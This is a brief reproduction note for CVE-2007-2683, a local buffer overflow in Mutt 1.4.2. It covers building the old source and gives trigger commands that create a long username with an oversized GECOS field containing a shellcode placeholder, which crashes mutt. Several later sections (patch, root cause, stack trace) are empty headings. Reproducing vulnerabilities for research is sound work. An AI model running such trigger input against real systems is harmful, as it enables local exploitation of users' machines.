CVE-2007-2683

Experiment Environment

Ubuntu 8.10

INSTALL & Configuration

wget https://github.com/mudongliang/source-packages/raw/master/CVE-2007-2683/mutt-1.4.2.2i.tar.gz
tar -xvf mutt-1.4.2.2i.tar.gz
cd mutt-1.4.2.2
./configure
make

Problems in Installation & Configuration

How to trigger vulnerability

USERNAME=$(perl -e 'print "a" x 31')
useradd -c '&&&&&&&&& your-favourite-ascii-shellcode-here' $USERNAME
echo alias billg $USERNAME >~/.muttrc
./mutt billg
Segmentation fault (core dumped)

PoCs

Mutt Mutt_Gecos_Name Function Local Buffer Overflow Vulnerability

Mutt 1.4.2 - Mutt_Gecos_Name Function Local Buffer Overflow

Vulnerability Patch

Root Cause

Stack Trace

Patch

References